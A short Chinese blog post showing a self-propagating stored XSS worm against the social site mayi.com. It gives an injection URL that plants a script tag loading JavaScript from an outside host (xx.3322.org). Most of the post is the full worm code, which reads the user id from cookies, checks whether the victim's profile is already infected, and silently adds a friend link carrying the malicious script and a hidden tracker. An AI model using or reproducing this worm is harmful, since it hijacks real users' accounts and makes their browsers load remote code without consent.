nowish
网址:http://www.mayi.com/
在空间设置–>友情链接–>名称中,可以加入Js代码,要实现蠕虫的功能,就要自动加链接,刚好找到一个GET的方法:
http://www.mayi.com/ajax/links.aspx?action=add&title=baidu%253Cscript%2Fsrc%253Dhttp%253A%2F%2Fxx.3322.org%2Fmayi%2Fa.js%253E%253C%2Fscript%253E&url=http%253A%2F%2Fwww.gg.com
但是在这里会一直加,貌似有DOS的意思,所以只加一次的方法判断是否已经感染,如果是就不加勒。下面直接放代码。不用问我,我也看不懂。
var id=getid();
var check=check();
function getid()
{
var cookie = document.cookie;
var cook = cookie.split(";");
var x = cookie.indexOf("uid");
var y = cookie.indexOf(":");
var id = cookie.substring(x + 4, y);
return id;
}//从cookies中分离出id,这个id会在check()函数中用到
function ajax()
{
var _xmlhttp;
try {
_xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {
try {
_xmlhttp=new XMLHttpRequest();
}
catch (e) {
_xmlhttp=false;
}
}
return _xmlhttp;
}
function check()
{
var url = "http://www.mayi.com/people/"+id;
var xmlhttp = ajax();
xmlhttp.open(’get’, url, false);
xmlhttp.send();
var page = xmlhttp.responseText;
var check=page.indexOf("xx.3322.org");
return check;
}//这个函数的功能是判断是否感染,可以看出是对比xx.3322.org这个字符串。
function postdata()
{ if (check == -1)
{
var url = "http://www.mayi.com/ajax/links.aspx?action=add&title=baidu%3Cscript/src%3Dhttp%3A//xx.3322.org/mayi/a.js%3E%3C/script%3E%3Cdiv%20style%3Ddisplay%3Anone%3E%3Cscript%20language%3Djavascript%20type%3Dtext/javascript%20src%3Dhttp%3A//js.users.51.la/xx.js%3E%3C/script%3E%3C/div%3E&url=http%253A%2F%2Fwww.baidu.com";
var xmlhttp = ajax();
xmlhttp.open(’get’, url, true);
xmlhttp.send();
}
}//ajax提交一个get,也就是增加一个友情链接。
postdata();